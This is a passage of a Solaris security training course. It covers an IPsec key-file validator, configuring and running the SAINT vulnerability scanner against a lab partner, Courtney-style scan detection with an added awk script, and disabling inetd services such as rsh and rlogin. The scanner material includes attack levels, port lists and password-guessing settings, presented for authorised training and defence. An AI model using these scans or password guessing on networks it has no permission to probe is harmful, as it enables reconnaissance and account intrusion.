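# Hex digits per key for the (protocol, algorithm) pairs the exercise uses: DES is
# a 64-bit key (16 hex digits), MD5 a 128-bit key (32).  Assumption of this example.
KEY_HEX_DIGITS = {("esp", "des"): 16, ("ah", "md5"): 32}
HEXDIGITS = re.compile(r"^[0-9a-fA-F]+$")
POLICY_LINE = re.compile(r"^\{([^}]*)\}\s*(apply|permit|bypass)\s*\{([^}]*)\}$")

def parse_key_file(text):
    """Parse ipseckey 'add' lines; backslash-newline continuations are joined."""
    entries = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        tok = line.split()
        if len(tok) < 4 or tok[0] != "add":
            raise ValueError("unrecognised ipseckey line: %r" % line)
        kv = dict(zip(tok[2::2], tok[3::2]))   # spi, src, dst, *alg, *key pairs
        entries.append({"proto": tok[1], "spi": kv.get("spi"), "src": kv.get("src"),
                        "dst": kv.get("dst"), "key": kv.get("encrkey") or kv.get("authkey") or "",
                        "alg": (kv.get("encralg") or kv.get("authalg") or "").lower()})
    return entries

def check_key_file(text, used_spis=()):
    """Return a list of problems (empty means OK); used_spis are SPIs already
    loaded elsewhere, since the exercise requires SPIs to be unique overall."""
    problems, seen_key, pairs = [], {}, set()
    seen_spi = set(str(s) for s in used_spis)
    for e in parse_key_file(text):
        tag = "%s spi %s" % (e["proto"], e["spi"])
        if e["spi"] in seen_spi:
            problems.append("%s: SPI already used" % tag)
        seen_spi.add(e["spi"])
        want = KEY_HEX_DIGITS.get((e["proto"], e["alg"]))
        if want is None:
            problems.append("%s: algorithm %r not valid for %s" % (tag, e["alg"], e["proto"]))
        elif not HEXDIGITS.match(e["key"]) or len(e["key"]) != want:
            problems.append("%s: %s key must be %d hex digits, got %r"
                            % (tag, e["alg"], want, e["key"]))
        if e["key"] in seen_key:            # one key per SA, never shared
            problems.append("%s: key reused from %s" % (tag, seen_key[e["key"]]))
        seen_key.setdefault(e["key"], tag)
        pairs.add((e["src"], e["dst"]))
    for src, dst in sorted(pairs):          # each direction needs its own SA
        if (dst, src) not in pairs:
            problems.append("no SA for return direction %s -> %s" % (dst, src))
    return problems

def parse_policy(text):
    """Parse '{selectors} action {properties}' ipsecconf entries."""
    rules = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = POLICY_LINE.match(line)
        if not m:
            raise ValueError("unrecognised ipsecconf line: %r" % line)
        sel = m.group(1).split()
        rules.append({"sel": dict(zip(sel[0::2], sel[1::2])), "action": m.group(2)})
    return rules

def policy_coverage(text, local_addr):
    """Report whether the policy protects every peer and protocol for local_addr:
    ipsecconf passes packets matching no entry in the clear, so an entry that
    names a peer (daddr/saddr) or a ulp protects only that traffic."""
    rules = parse_policy(text)
    def covers_all(rule, action, own_key, peer_key):
        return (rule["action"] == action
                and rule["sel"].get(own_key, local_addr) == local_addr
                and peer_key not in rule["sel"] and "ulp" not in rule["sel"])
    peers = set()
    for r in rules:
        if r["action"] == "apply" and "daddr" in r["sel"]:
            peers.add(r["sel"]["daddr"])
        if r["action"] == "permit" and "saddr" in r["sel"]:
            peers.add(r["sel"]["saddr"])
    return {"outbound_all": any(covers_all(r, "apply", "saddr", "daddr") for r in rules),
            "inbound_all": any(covers_all(r, "permit", "daddr", "saddr") for r in rules),
            "named_peers": sorted(peers)}

# Constructed sample files modelled on the exercise solutions above.
# Deliberately flawed: SPI 20 reused, a 16-digit MD5 key, DES named as an AH algorithm.
AH_KEYS_BAD = """\
add ah spi 20 src 192.168.0.1 dst 192.168.0.2 authalg md5 authkey 1234567890123456
add ah spi 23 src 192.168.0.2 dst 192.168.0.1 authalg des authkey 21398765432129876543210987654321
"""
ALL_HOSTS_POLICY = """\
{saddr 192.168.0.1} apply {auth_algs any encr_algs any sa shared}
{daddr 192.168.0.1} permit {auth_algs any encr_algs any}
"""

if __name__ == "__main__":
    print(check_key_file(AH_KEYS_BAD, used_spis=(20, 21)))   # ESP file used SPIs 20, 21
    print(policy_coverage(ALL_HOSTS_POLICY, "192.168.0.1"))
```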

Removing IPsec

There are no solutions for this task.


Module 12

Analyzing Network Services

Objectives

Upon completion of this module, you should be able to:

● Apply Security Administrators Integrated Network Tool (SAINT) to improve network security

● Install SAINT and launch probes using the SAINT graphical user interface

● Configure SAINT using the configuration file

● Interpret SAINT reports

● Use the Courtney scanning tool to detect SAINT-type attacks


Relevance


Discussion – System administration of network services is a complex task. It is easy to inadvertently leave security holes when changing network configurations. Network service probes such as SAINT can identify security holes.

● Given that SAINT was originally a “hacker” tool, how safe is it to use it on a production network?

● Is it better to use a prewritten tool like SAINT or to write an analytical suite of tools tailored to your own network?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Solaris OE manual pages.

● Garfinkel, Simson, and Spafford, Gene. Practical UNIX & Internet Security. O’Reilly & Associates, Inc. 1996.

● Comparison article of the capabilities of various scanners, Network Computing online at http://www.networkcomputing.com/1201/1201f1b1.html

● SAINT online documentation, available at http://www.wwdsi.com/saint/saint_documentation_2.html

Tool Downloads

● SAINT: http://www.wwdsi.com/saint/

● Courtney: http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html#Courtney

● openssl for Solaris OE, required by tcpdump: http://www.sunfreeware.com

● libpcap for Solaris OE, required by tcpdump: http://www.sunfreeware.com

● tcpdump for Solaris OE, required by SAINT: http://www.sunfreeware.com


Applying SAINT to Improve Network Security

Tools are available to probe system network services and to determine whether these services are configured in a secure way. You can use various tools to analyze different aspects of the network. The most complete tool is called the Security Administrator's Integrated Network Tool (SAINT). SAINT is the second generation version of the System Administrators Tool for Analyzing Networks (SATAN) network probe and has been widely used by intruders to detect weaknesses in network configurations. SAINT can be a very effective tool for the administrator.

SAINT consists of a suite of Perl modules that provide an interface into a Web browser. The tool has the low-level capabilities of Perl combined with an easy-to-use, thin client interface. In fact, SAINT is so easy to use that it can be a real menace in the hands of external parties wanting to probe a network for weaknesses.


Caution – Virtually all Internet Service Providers (ISPs), and many public networks, absolutely prohibit the use of any network probes or other analytical utilities without prior written permission. Punishments for infringement are stringent (usually a permanent removal of access privileges). Before using SAINT, ensure that you have documented permission to analyze the targeted network.


Assessing the Capabilities of SAINT

SAINT operates by running standard Solaris OE utilities (called probes) in certain, predefined ways. The information SAINT obtains is then logged to a datastore and displayed in the form of SAINT reports. All of this could be done manually, but SAINT’s advantage is that it is automatic and predefined. Because SAINT is a next generation tool, it offers significant advantages over SATAN’s user interface, but still shares the primary aim, which is to detect potential security flaws (usually incorrectly set up or configured services). Because SAINT discovers security flaws in the target systems, it can also find systems attached to the target. These systems can also be probed and an entire network analyzed.

Certain security problems are well-known and documented. That means that these security problems can be specifically looked for in the target system. These reports from SAINT are especially useful.


SAINT’s strength is that the information gathered can be reported in HTML format. In addition, a number of add-in tools can obtain additional value from SAINT output. Some of these tools are freeware, while others are commercial products. SAINT can then use these tools to report on this data or use a simple rule-based system to investigate any potential security problems.

While SAINT is primarily designed for analyzing the security implications of the results, you can also obtain lots of general network information when using the tool, including network topology, network services, and types of hardware and software being used on the network.

Comparing SAINT and SATAN

SATAN is an earlier generation tool. Like SAINT, SATAN can examine network services such as finger, Network File Service (NFS), Network Information Service (NIS+), ftp, tftp, and rexecd.

SATAN was written by Dan Farmer and Wietse Venema. It gained a reputation as a “hacking” tool, partly because of the offensive name. Later, SATAN became “respectable.” To mitigate some of the uproar surrounding its name, a “repent script” was created that would rename the tool to SANTA (Security Analysis Network Tool for Administrators), while retaining the functionality.

SAINT is more advanced and has much better reporting than SATAN.


Installing and Using SAINT

SAINT requires you to install the tcpdump utility on the system using SAINT. The tcpdump utility can be downloaded from the Sun Freeware site at http://www.sunfreeware.com.

You can obtain SAINT by downloading the source or binaries at World-Wide Digital Security Inc.: http://www.wwdsi.com/saint/.

Follow these steps to install SAINT:

1. Download the latest version of SAINT (normally a zipped TAR archive).

2. Unzip the file and extract the archive (the archive contains a subdirectory named after the version of SAINT).


3. Read the instructions in the README file in the SAINT subdirectory. With version 3.2 of SAINT, you must run the following commands from the SAINT directory:

# ./configure
# make
# make install

This builds the SAINT executable in the current directory.

Note – SAINT supports two different procedures for configuring and compiling the software. The newer procedure uses the configure script. The older method uses the makefile utility. However, the makefile utility is less convenient and is not presented here.


Understanding How SAINT Works

SAINT runs standard components which probe a system to see if it is vulnerable to certain types of attack. A configuration file can preconfigure SAINT. You can change the options at run-time using the Web interface, as presented in “Installing and Using SAINT” on page 12-8, but the application settings are managed by a Perl configuration file.


SAINT defines what it detects as attacks. However, these should more properly be called analyses because they do not actually attack anything. You can configure the way in which the analysis is made, the scope (how wide an analysis is made), and the attack level.

Warning – Certain SAINT options are dangerous and can cause major network problems. Do not change any configurations unless you are sure of what you are changing.


Using the SAINT Graphical User Interface

SAINT has an easy-to-use graphical user interface (GUI). The SAINT engine reads the configuration file (described in “Configuring SAINT” on page 12-21) to provide default values, but these can be changed at run-time through the SAINT Control Panel. The SAINT Control Panel leads you through a sequence of steps to ensure that SAINT has the required information before it begins probing. Default information is based on the saint.cf file.


On startup, SAINT presents a menu form in your default browser as shown in Figure 12-1.

Figure 12-1 SAINT Startup Screen

Use the images on the left side of the form to configure various aspects of SAINT. The options are:

SAINT home – Selects the startup screen

Data Management – Selects the SAINT database for storing data

Target Selection – Selects the hosts which will be analyzed

Data Analysis – Displays the results of running the SAINT analysis

Configuration Management – Selects the attack level and other parameters

Documentation – Provides HTML documentation for configuring and using SAINT


Defining SAINT Data Management

SAINT obtains considerable amounts of data from the network it is probing. The SAINT database stores this data so that it can be analyzed. You can define which file is used as shown in Figure 12-2.

Figure 12-2 Defining Where the Data Obtained by SAINT Is Stored

Troubleshooting – Provides help with common SAINT problems


Setting SAINT Target Selection

Host names can be entered directly or, in the case of multiple hosts, from a prewritten configuration file, as shown in Figure 12-3.

Figure 12-3 Entering the Names of Hosts to Probe


Defining the Level of Attack

The level of attack governs how many and what type of probes are used against a host. “Configuring SAINT” on page 12-21 describes detailed information on attack levels. You can set the attack level in the GUI as shown in Figure 12-4.

Microsoft Windows NT machines have certain special scans associated with them because Microsoft Windows NT makes shared ports available as part of its networking strategy. This strategy makes such machines especially vulnerable to attack.

Figure 12-4 Setting the Scanning Level


Allowing for Firewalls

SAINT must know if there is a firewall, because firewalls block certain packets. If SAINT does not know about the firewall, then any machines hidden behind the firewall are invisible. You can indicate whether the host you are scanning is behind a firewall, as shown in Figure 12-5.

Figure 12-5 Allowing for Firewalls

When you have reached the screen shown in Figure 12-5, you can begin a scan.


Running a SAINT Scan

To run a scan, click Start the Scan on the Target Selection screen. See Figure 12-5 on page 12-17 for a detailed view. This button initiates the scan, which takes less than a minute for a light scan of a single host. A heavy scan of a host takes several minutes, and more intensive scans involving several hosts take much longer.

The first time SAINT runs, a warning screen appears as shown in Figure 12-6 on page 12-18.

Figure 12-6 SAINT Warning Message

Click on the browser Reload Page icon to start the vulnerability scan.


A status screen tracks the scan as it progresses. When the scan is complete, the screen displays options for viewing the results of the scan as shown in Figure 12-7.

Figure 12-7 SAINT Scan Complete


The SAINT data results page summarizes the results of the scan as shown in Figure 12-8.

Figure 12-8 SAINT Data Analysis Results


Configuring SAINT

The central configuration of SAINT is based on the saint.cf file. The file is a Perl module which is loaded and interpreted when the SAINT system initializes. The file is divided into a number of sections, each controlling an aspect of the attacks to make.

The following rules help you to understand the file:

1. Lines starting with # are comments and are ignored.

2. Important lines have comments by them. Always read the comment. Remember that versions of software and meanings can change.

3. A value of 0 (zero) or null ("") usually means FALSE.

4. A value of 1 usually means TRUE.

The rest of this section discusses some of the more important features of the configuration file.


Setting the Attack Level

The attack level defines the extent to which SAINT attempts to infiltrate the target system (in other words, the exact level of the analysis to be carried out). The default is set to light (attack level 1). Light attacks are simple, quick, and largely non-intrusive. Because they are non-intrusive, they can be difficult to detect. They also provide less information than other attacks. Heavy attacks (level 2) are slow but gather more information. They are also fairly easy to detect after the attack has been made. Most intruders using SAINT start a probe using a light attack, then move to a higher level if they believe that the initial attack was undetected.

Any attack level greater than 2 can be dangerous. Attack levels greater than 2 can be so detailed, with such long time-outs, that the targeted system can crash.


Level 4 is a special attack level. This is not heavier than level 3, but instead it deliberately analyzes a system to detect vulnerabilities on the System Administration, Networking, and Security (SANS) list of the 10 most critical internet security threats (see http://www.sans.org/topten.htm). Level 4 is potentially the most useful analysis because it can be run repeatedly against a system to detect if changes have been made that render the system open to a casual attack.

The attack level is determined by the setting of the $attack_level variable, as follows:

# Default attack level (0=light, 1=normal, 2=heavy,
# 3=heavy+, 4=top10, 5=custom)
$attack_level = 0;

Configuring Probes by Attack Level

Each attack uses certain probes. Probes are the modules which run each attack. While the $attack_level variable determines which probes are run against a target to build the attack, you can change the probes which are run within that level. This means that the attacks are not fixed but can be reconfigured. However, you cannot configure all probes to run. If a probe has a question mark (?) appended to its name, it runs conditionally. This means that if the service for which the probe is designed is not running, then the probe does not run (for example, if the target machine is not running the NFS service, then the NFS probe does not run).

The probes are listed in the Probes by attack level section of the configuration file, as shown in Code 12-1.

Code 12-1 Probes by Attack Level

13 # Probes by attack level.
14 #
15 # ? Means conditional, controlled by rules.todo.
16 # * Matches anything.
17 @light = (
18     'dns.saint',
19     'ostype.saint',
20     'rpc.saint',
21     'showmount.saint?',
22 );
23
24 @normal = (
25     @light,
26     'finger.saint',
27     'tcpscan.saint 70,80,ftp,telnet,smtp,nntp,uucp,6000',
28     'udpscan.saint 53,177',
29     'rusers.saint?',
30     'boot.saint?',
31     'yp-chk.saint?',
32 );
33
34 @heavy = (
35     @light,
36     'finger.saint',
37     'rusers.saint?',
38     'boot.saint?',
39     'yp-chk.saint?',
40     $heavy_tcp_scan = 'tcpscan.saint 16660,27665,65000,1-1525,1527-9999',
41     $heavy_udp_scan = 'udpscan.saint 27444,31335,1-1760,1763-2050,32767-33500',
42     '*?',
43 );

In the @heavy scan section beginning on Line 34 there is an entry (on Line 42) marked *?. That entry means that all probes not explicitly loaded by the script are conditionally loaded.


Setting the Level of Password Guessing

SAINT can test the suitability of various passwords on the system. That is, it can detect the following unsuitable entries:

● A null password

● A password which is the same as a login name

● The word “password”

● The login name spelled backwards

● The login name followed by the digit “1”

The password guessing section of the configuration file is shown in Code 12-2 on page 12-26.


Code 12-2 Password Guessing

# Number of passwords to guess for each account
# identified by rusers or finger. Greater than 2
# will lock out accounts on some systems.
# 0 disables password guessing.
$password_guesses = 2;

Caution – Some systems lock out accounts if the number of password guesses exceeds a preset number (usually 3). If this is the case with your system, set $password_guesses lower than the lock out value or SAINT causes user lockouts.


Setting Time-Outs

You might need to specify a time-out for certain probes. Time-outs prevent probes from unnecessarily locking up system resources or crashing the system when the probe fails to obtain a response from the target system. Time-outs are managed by a section in the configuration file. To specify time-outs:

1. Specify the general (implicit) time-out to be used this way:

# which timeout to use (0=short, 1=med, 2=long)
$timeout = 1;

2. Specify an explicit time-out by using lines designated to specific services:

$nfs_chk_timeout = $long_timeout;
$snmp_timeout = 120;


Determining Values for Proximity Variables

Proximity variables control how far the scan is allowed to spread from the original SAINT probe target.

Note – Proximity variables are the most important configuration variables in the SAINT system. Setting $max_proximity_level higher than 3 can cause multiple problems: the extent of the attack becomes hard to limit, and both the network traffic and the log information generated grow accordingly.


When you determine the required proximity level, use the value of 0 to indicate the initial target host. Machines adjacent to the target host have a value of 1. Machines adjacent to those hosts have a value of 2, and so on. Therefore, if $max_proximity_level is set to 1, the target host and any hosts adjacent to it are probed. The number of hosts that SAINT scans can grow exponentially if you increase $max_proximity_level without carefully thinking about the attack plan. Code 12-3 shows the proximity variable section of the configuration file.

Code 12-3 Setting the Proximity Variable

# Proximity variables; how far out do we attack,
# does severity go down, etc.
#
# how far out from the original target do we attack?
$max_proximity_level = 0;


You should reduce the strength of the attack as it propagates farther from the initial target system. This practice reduces the chance of bringing an entire network to a standstill through inadvertent probing. To reduce the strength of the attack, change the proximity descent variable in this section of the configuration file, as shown in Code 12-4.

Code 12-4 Reducing the Strength of the Attack

# Attack level drops by this much each
# proximity level change
$proximity_descent = 1;

With the setting shown in Code 12-4, the attack level drops by 1 for each successive layer of hosts beyond the initial target host. This does not apply when the attack level is set to 4 (SANS Top 10): at that level the attack level stays the same at every proximity level.

Note – For more detailed information on configuration file settings, see the SAINT documentation on the saint.cf file (online at http://www.wwdsi.com/cgi-bin/doc.pl?document=saint.cf).


Interpreting SAINT Reports

SAINT can produce many different types of reports, which you can view with a Web browser. This section shows two examples, but during the practical exercise you should examine as many reports as you can.

Reporting Vulnerabilities by Type

Listing vulnerabilities by type is the most basic report. In this report details are summarized and you are given a list of all the vulnerabilities SAINT detected for the given attack, as shown in Figure 12-9.

Figure 12-9 Report of Vulnerabilities by Type


Reporting Potential Problems

The potential problems report, shown in Figure 12-10, shows the type of vulnerability detected on each system.

Figure 12-10 Listing Potential Problems

Note – The comment in Figure 12-10 about “Back Orifice backdoor found” is particularly noteworthy. Back Orifice is a Microsoft Windows NT Trojan horse that can seriously impair network security for all hosts. Solaris OE administrators must be aware of the specific problems associated with Microsoft Windows NT machines on a hybrid network.


Detecting Network Analyzer Attacks

Many tools can detect SAINT and similar scanners. You can obtain a good review of these at http://ciac.llnl.gov/ciac/ToolsUnixNetMon.html. Some of the tools discussed are:

● Gabriel – A tool from Los Altos Technologies, written in the C programming language for Solaris OE versions 1 and 2.

● Netman – A package from Curtin University. Netman is not a probe detector but a full network monitoring package.

● NOCOL – Also a tool from Curtin University. It detects and monitors all network activity (not only SAINT or SATAN).

● Courtney – A tool written by the Computer Incident Advisory Capability (CIAC), specifically designed to monitor for and detect SAINT or SATAN scans.


Detecting Attacks Using Courtney

The Courtney utility warns administrators of a SAINT or SATAN scan. Courtney takes its input from the tcpdump utility and counts the number of new services each machine connects to within a certain time frame. A machine is identified as a potential SAINT host if it connects to numerous services within that time frame. Like SAINT, Courtney is a Perl utility.

To run Courtney, you need Perl 5 and you must have the tcpdump utility installed. Perl is part of the standard Solaris OE build, but you must download and install the tcpdump utility from the site listed in “Additional Resources” on page 12-3.
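The counting logic Courtney applies is simple enough to reproduce. The following script is an added example written for this edition, not Courtney's own code: it reads tcpdump-style lines (the sample capture is constructed, and the thresholds and the 60-second window are assumptions rather than Courtney's defaults), counts the distinct destination ports each source host touches on a target inside the window, and labels the source NORMAL_ATTACK or HEAVY_ATTACK in the style of Code 12-5.

```shell
#!/bin/sh
# Added example in the spirit of Courtney, not Courtney's own code.
# Reads tcpdump-style lines and counts, per source host and target, how
# many distinct destination ports were touched inside a time window.
# Thresholds and the window length are assumptions for this example.

# Constructed sample capture (time  src.port > dst.port: flags).
SAMPLE_CAPTURE='00:18:10.100 wallace.40001 > grommit.21: S
00:18:10.101 wallace.40002 > grommit.23: S
00:18:10.102 wallace.40003 > grommit.25: S
00:18:10.103 wallace.40004 > grommit.79: S
00:18:10.104 wallace.40005 > grommit.111: S
00:18:10.105 wallace.40006 > grommit.512: S
00:18:10.106 wallace.40007 > grommit.513: S
00:18:10.107 wallace.40008 > grommit.514: S
00:18:10.108 wallace.40009 > grommit.2049: S
00:18:10.109 wallace.40010 > grommit.6000: S
00:18:12.000 alice-pc.1025 > grommit.23: S
00:18:14.000 alice-pc.1026 > grommit.23: S
00:19:40.000 bob-pc.1027 > grommit.21: S
00:19:41.000 bob-pc.1028 > grommit.23: S
00:19:42.000 bob-pc.1029 > grommit.79: S'

# classify_scans [NORMAL] [HEAVY] [WINDOW_SECONDS]
# Reads capture lines on stdin. A source that touches at least NORMAL
# distinct ports on one target inside a WINDOW_SECONDS bucket is reported
# as NORMAL_ATTACK, at least HEAVY as HEAVY_ATTACK; quieter hosts are
# ignored, so a user retrying telnet (alice-pc above) is not flagged.
classify_scans() {
    awk -v normal="${1:-4}" -v heavy="${2:-9}" -v win="${3:-60}" '
    function tosec(t,   p) { split(t, p, ":"); return p[1] * 3600 + p[2] * 60 + p[3] }
    {
        src = $2; sub(/\.[0-9]+$/, "", src)       # drop the source port
        dst = $4; sub(/:$/, "", dst)              # drop the trailing colon
        port = dst; sub(/^.*\./, "", port)        # destination port
        sub(/\.[0-9]+$/, "", dst)                 # destination host
        key = src " " dst " " int(tosec($1) / win)
        if (!((key, port) in seen)) { seen[key, port] = 1; count[key]++ }
    }
    END {
        for (key in count) {
            if (count[key] >= heavy)       lvl = "HEAVY_ATTACK"
            else if (count[key] >= normal) lvl = "NORMAL_ATTACK"
            else continue
            split(key, f, " ")
            printf "%s from %s - target %s (%d ports)\n", lvl, f[1], f[2], count[key]
        }
    }'
}

# Demo: classify the constructed capture with the default thresholds.
printf '%s\n' "$SAMPLE_CAPTURE" | classify_scans
```

Run the script as-is to see the constructed capture classified, or pipe live output (tcpdump -l -n) into classify_scans; the field positions assume tcpdump's "src.port > dst.port:" layout, so adjust the awk if your tcpdump version formats lines differently.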


Obtaining and Installing Courtney

You can obtain the Courtney utility from a number of FTP sites. This example of Courtney, called courtney.tar.gz, was retrieved from ftp://ciac.llnl.gov/pub/ciac/sectools/unix/courtney/. To install Courtney:

1. Uncompress and unarchive the courtney-1.3.tar.gz file.

2. The Courtney Perl script uses a hard-coded search path variable. Unfortunately, this variable does not include the /usr/local/sbin directory where the tcpdump utility resides. The easiest solution is to link the tcpdump utility into the /usr/local/bin directory by entering:

# ln /usr/local/sbin/tcpdump /usr/local/bin

3. Alternatively, update the Courtney script to set the correct search path. Edit the courtney.pl script and search for the line starting $ENV{'PATH'}. Update the associated search path to include the path to the tcpdump utility (/usr/local/sbin):

$ENV{'PATH'}='/bin:/usr/bin:/usr/ucb:/usr/bsd:/usr/sbin:/usr/etc:/usr/local/bin:/usr/local/sbin';


Using Courtney

Start Courtney, as shown in Code 12-5, with the output directed to standard output. It reports any SAINT scans (or similar scans).

Code 12-5 Using Courtney

# ./courtney.pl -s
tcpdump: listening on hme0
00:18:10: NORMAL_ATTACK from wallace - target grommit
00:18:11: HEAVY_ATTACK from wallace - target grommit

By default, attacks are also logged through syslog at the alert priority level. This logging can be disabled with the -l option.

Use the -h option of the Courtney command for a full list of command line options.


Exercise: Using SAINT and Courtney

In this exercise, you will complete the following tasks:

● Install SAINT and perform different levels of attack

● Install and use Courtney to detect attacks

Preparation

Ensure that you have installed the GNU C++ compiler and the make utility. For the purposes of this exercise you will work in pairs to configure SAINT scanning between your workstation and your partner's workstation. You will subsequently configure Courtney to detect scanning attacks on your workstation.

Warning – Due to the nature of the TCP/IP stack implementation on the Solaris OE, Courtney can only detect scans initiated by another workstation; it does not detect scans originating from the workstation it runs on.

Ensure you know the host names of your workstation and your partner's workstation.

Task – Installing SAINT

The SAINT download site is listed in “Additional Resources” on page 12-3. A copy of the download file (saint-3.2.tar) is also in the /usr/local/pkg directory.

SAINT uses the tcpdump utility, which is not supplied with the Solaris 8 OE. This package also requires the openssl and libpcap packages. These are available from the sites listed in “Additional Resources” on page 12-3, and are included in the /usr/local/pkg directory. These software packages might already have been installed in a previous exercise of this course.


To install SAINT:

1. Extract the SAINT archive into the /usr/local directory to create a subdirectory called saint-3.2.

2. Follow the instructions in the README file in the saint-3.2 directory to install SAINT.

Task – Running a SAINT Attack

To run a SAINT attack:

1. Start SAINT and then run a light SAINT attack on your partner's workstation and analyze the results.

2. Use the SAINT Target Selection page to select the target host name and the scanning level, then click Start the Scan.

3. Run a heavy attack to gain even more information.

Task – Running SAINT From the Command Line

To run SAINT from the command line:

1. Run a medium level attack on your partner's workstation, but initiate it from the command line.

2. You can use the -h option to obtain command line help from SAINT:

# ./saint -h

Task – Installing Courtney

The Courtney download site is listed in “Additional Resources” on page 12-3. A copy of the download file (courtney-1_3.tar) is also in the /usr/local/pkg directory.

Courtney uses the tcpdump utility, which is not supplied with the Solaris 8 OE. This package also requires the openssl and libpcap packages. These are available from the sites listed in “Additional Resources” on page 12-3 and are included in the /usr/local/pkg directory. They will have been installed in the first exercise for this module.


To install Courtney:

1. Extract the Courtney archive and read the README file.

2. Include the tcpdump utility in Courtney's search path by linking it into the /usr/local/bin directory.

Task – Using Courtney to Detect Attacks

You must coordinate your work with another person in the class. One of you will be the attacker and the other the target.

To use Courtney to detect attacks:

1. Initially, the target workstation must run Courtney from a command window, displaying the output on the screen.

2. The attacker must now run SAINT attacks to verify that Courtney detects them. Start with a light SAINT attack and increase the level until Courtney recognizes the attack.


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

This section provides the solutions for this module’s exercises.

Installing SAINT

1. Extract the archive into the /usr/local directory to create a subdirectory called saint-3.2.

2. Follow the instructions in the README file in the SAINT directory to install SAINT.

# cd /usr/local
# cd pkg
# pkgadd -d libpcap-0_6_1-sol8-sparc-local
# pkgadd -d openssl-0_9_6-sol8-sparc-local
# pkgadd -d tcpdump-3_6_1-sol8-sparc-local
# cd ..
# tar xvf pkg/saint-3.2.tar
# cd saint-3.2
# more README
# ./configure
# make
# make install

Running a SAINT Attack

1. Start SAINT and then run a light SAINT attack on your partner's workstation and analyze the results.

# ./saint

2. Use the SAINT Target Selection page to select the target host name and the scanning level, then click Start the Scan.

3. Run a heavy attack to gain even more information by returning to the Target Selection page and selecting a heavy attack.


Running SAINT From the Command Line

1. With the permission of someone else in the class, run a medium level attack on their machine, but initiate it from the command line.

# cd /usr/local/saint-3.2
# ./saint -i -a 1 wallace
wallace:

Critical Problems:
    Exports /export/home to everyone

Areas of Concern:
    Information from ruserid could help hacker

Services:
    FTP
    XDM (X login)
    Telnet
    uucp
    X Windows
    NFS

Installing Courtney

1. Extract the Courtney archive and read the README file.

# cd /usr/local
# tar xvf pkg/courtney-1_3.tar
# cd courtney-1.3
# more README

2. Include the tcpdump utility in Courtney's search path by linking it into the /usr/local/bin directory.

# ln /usr/local/sbin/tcpdump /usr/local/bin

Using Courtney to Detect Attacks

1. Initially, the target workstation must run Courtney from a command window, displaying the output on the screen.

# ./courtney.pl -s

2. The attacker must now run SAINT attacks to verify that Courtney detects them. Start with a light SAINT attack and increase the level until Courtney recognizes the attack.


Module 13

Security Network Services

Objectives

Upon completion of this module, you should be able to:

● Configure network services such as telnet and FTP

● Configure remote access using rlogin and rsh commands

● Explain the role of the chroot command for enhanced security

● Configure Anonymous FTP

● Describe the role of authentication tools

● Configure and use Pluggable Authentication Module (PAM)

● Disable the use of rhosts files

● Describe the Sun Enterprise Authentication Mechanism (SEAM) and the Kerberos 5 protocol


Relevance


Discussion – The following questions are relevant to understanding the role of network services:

● Can you run your servers without providing network services?

● Can you list the network services you are running on the hosts you administer?

● Which network services must you have and which are just convenient?

● Which of the network services require user authentication and which are open to all users?


Additional Resources

Additional resources – The following references provide additional information on the topics described in this module:

● Online manual pages for chroot(1M), exec(3), hosts.equiv(4), inetd(1M), inetd.conf(4), in.ftpd(1M), login(1), netgroup(4), pam(3PAM), pam.conf(4), pam_unix(5), rlogin(1), and rsh(1)

● Solaris OE AnswerBook 2.

● Garfinkel, Simson, and Spafford, Gene. Practical UNIX & Internet Security. O'Reilly & Associates, Inc. 1996.

● Kerberos Home Page online[http://web.mit.edu/kerberos/www/]


Restricting Network Services

The standard Solaris OE installation enables, by default, a number of network services in the /etc/inetd.conf file. Many of these services are there for historical reasons and are unnecessary. Some services (such as finger and rusers) reveal information about the host and its user login names that intruders can use to attack those systems.

Consider disabling some or all of the standard network facilities described in Table 13-1 on page 13-5. Edit the /etc/inetd.conf file by commenting out entries instead of erasing them; this makes it easy to restore a disabled network service later. After editing the file, send inetd a SIGHUP so that it re-reads the configuration.
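As an added example (not part of the course materials), the following script performs that edit on a scratch copy of the file: it comments out named services, lists what is still active, and restores an entry. The sample inetd.conf lines are constructed for the example and the temporary file name is arbitrary; on a real host you would run disable_service against /etc/inetd.conf itself and then signal inetd.

```shell
#!/bin/sh
# Added example (not from the course): comment out inetd services on a
# copy of /etc/inetd.conf rather than deleting them, and restore one.
# The configuration lines below are constructed for the example; they
# follow the Solaris 8 inetd.conf layout but are not copied from a host.

SAMPLE_INETD_CONF='# constructed /etc/inetd.conf fragment
ftp     stream  tcp     nowait  root    /usr/sbin/in.ftpd       in.ftpd -l
telnet  stream  tcp     nowait  root    /usr/sbin/in.telnetd    in.telnetd
shell   stream  tcp     nowait  root    /usr/sbin/in.rshd       in.rshd
login   stream  tcp     nowait  root    /usr/sbin/in.rlogind    in.rlogind
finger  stream  tcp     nowait  nobody  /usr/sbin/in.fingerd    in.fingerd
talk    dgram   udp     wait    root    /usr/sbin/in.talkd      in.talkd
rusersd/2-3  tli  rpc/datagram_v,circuit_v  wait  root  /usr/lib/netsvc/rusers/rpc.rusersd  rpc.rusersd'

# disable_service FILE SERVICE
# Prefix the active line(s) for SERVICE with "#" so the text survives and
# can be restored later. Only the service field is compared, and an RPC
# entry such as "rusersd/2-3" matches on the part before the slash.
disable_service() {
    tmp="$1.tmp.$$"
    awk -v svc="$2" '
        !/^#/ && ($1 == svc || index($1, svc "/") == 1) { print "#" $0; next }
        { print }' "$1" > "$tmp" && mv "$tmp" "$1"
}

# enable_service FILE SERVICE: strip the leading "#" added above.
enable_service() {
    tmp="$1.tmp.$$"
    awk -v svc="$2" '
        /^#/ {
            line = substr($0, 2); n = split(line, f)
            if (n > 0 && (f[1] == svc || index(f[1], svc "/") == 1)) { print line; next }
        }
        { print }' "$1" > "$tmp" && mv "$tmp" "$1"
}

# enabled_services FILE: names of the services still active, one per line.
enabled_services() {
    awk '!/^#/ && NF > 0 { sub(/\/.*/, "", $1); print $1 }' "$1"
}

# Demo on a scratch copy. On a real host edit /etc/inetd.conf itself and
# then make inetd re-read it:  pkill -HUP inetd
demo_inetd() {
    f=/tmp/inetd.conf.demo.$$
    printf '%s\n' "$SAMPLE_INETD_CONF" > "$f"
    for s in finger talk rusersd shell login; do
        disable_service "$f" "$s"
    done
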